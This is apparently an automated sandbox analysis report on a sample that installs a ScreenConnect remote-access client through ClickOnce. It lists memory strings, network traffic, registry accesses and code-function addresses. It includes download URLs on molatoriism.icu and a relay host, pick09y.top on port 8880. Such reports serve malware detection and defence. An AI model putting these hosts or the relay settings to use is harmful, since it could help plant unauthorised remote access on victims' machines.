                  Source: dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3909247631.000002356D204000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.0000000003101000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2466794218.000000000131F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2473313844.000000001B9E4000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConne
                  Source: dfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472519815.0000000001774000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2466646633.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp, V0C4K20S.log.1.drString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
                  Source: dfsvc.exe, 00000001.00000002.3915635495.0000023570D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Suppb/
                  Source: V0C4K20S.log.1.drString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationIEluYy4xQTA/BgNV
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.000000000310F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationX
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application_
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationanifestInformati
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationb7ytSaJw8jfmvNXeB
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationdb01L
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationdb01RReJz3iq4
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationosoft
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applications
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applications_
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applications_34e089Y
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applications_e089
                  Source: dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applications_l0899
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationz.
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp, V0C4K20S.log.1.drString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.3915848532.000002357165D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.manifestU0E0MDk2U0hBMzg0MjAyMUNBMS5jcnQwDAYDVR0TAQH
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientSe
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.dllA0
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3915104287.0000023570CFC000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Wind
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.3909247631.000002356D1C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Windows.dlld
                  Source: dfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Windows.dllkg
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config(
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configF
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsC
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350046F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configU
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exen
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exet
                  Source: qmgr.db.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownHTTPS traffic detected: 172.67.182.214:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                  System Summary

                  barindex
                  Source: pzPO97QouM.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F5A4950_2_00F5A495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F38A101_2_00007FF848F38A10
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F5EA8D1_2_00007FF848F5EA8D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F26AD51_2_00007FF848F26AD5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F43AE81_2_00007FF848F43AE8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F58CA61_2_00007FF848F58CA6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F5ABA51_2_00007FF848F5ABA5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F53BC31_2_00007FF848F53BC3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F5CBCE1_2_00007FF848F5CBCE
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F51E221_2_00007FF848F51E22
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F3AE3F1_2_00007FF848F3AE3F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2EE641_2_00007FF848F2EE64
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2AED51_2_00007FF848F2AED5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F39D7D1_2_00007FF848F39D7D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F4B0081_2_00007FF848F4B008
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F4B0381_2_00007FF848F4B038
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F45FED1_2_00007FF848F45FED
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F462911_2_00007FF848F46291
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F292991_2_00007FF848F29299
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F531CD1_2_00007FF848F531CD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F5C4211_2_00007FF848F5C421
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F524511_2_00007FF848F52451
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F414A01_2_00007FF848F414A0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F3F4D81_2_00007FF848F3F4D8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2D4ED1_2_00007FF848F2D4ED
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F583361_2_00007FF848F58336
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F233C01_2_00007FF848F233C0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F413D81_2_00007FF848F413D8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F3F5181_2_00007FF848F3F518
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2F54A1_2_00007FF848F2F54A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F285701_2_00007FF848F28570
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2C5701_2_00007FF848F2C570
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F3D5991_2_00007FF848F3D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F515A81_2_00007FF848F515A8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F495F71_2_00007FF848F495F7
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2A82F1_2_00007FF848F2A82F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F268581_2_00007FF848F26858
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F5D8701_2_00007FF848F5D870
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F3E8A01_2_00007FF848F3E8A0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F328E01_2_00007FF848F328E0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F597411_2_00007FF848F59741
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F207E81_2_00007FF848F207E8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F43A101_2_00007FF848F43A10
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F43AF01_2_00007FF848F43AF0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F43CA51_2_00007FF848F43CA5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F43CDD1_2_00007FF848F43CDD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F59CF11_2_00007FF848F59CF1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F4CBCD1_2_00007FF848F4CBCD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F4CBF01_2_00007FF848F4CBF0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2FE111_2_00007FF848F2FE11
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F260501_2_00007FF848F26050
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F450711_2_00007FF848F45071
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2D0891_2_00007FF848F2D089
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F430F11_2_00007FF848F430F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F59F1E1_2_00007FF848F59F1E
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F46F391_2_00007FF848F46F39
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F212111_2_00007FF848F21211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F381601_2_00007FF848F38160
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F414A51_2_00007FF848F414A5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F414A81_2_00007FF848F414A8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F293661_2_00007FF848F29366
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F333A11_2_00007FF848F333A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F4C5561_2_00007FF848F4C556
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F4C5701_2_00007FF848F4C570
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F285901_2_00007FF848F28590
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F428601_2_00007FF848F42860
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F3779D1_2_00007FF848F3779D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F5675010_2_00007FF848F56750
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F210CF10_2_00007FF848F210CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F210D710_2_00007FF848F210D7
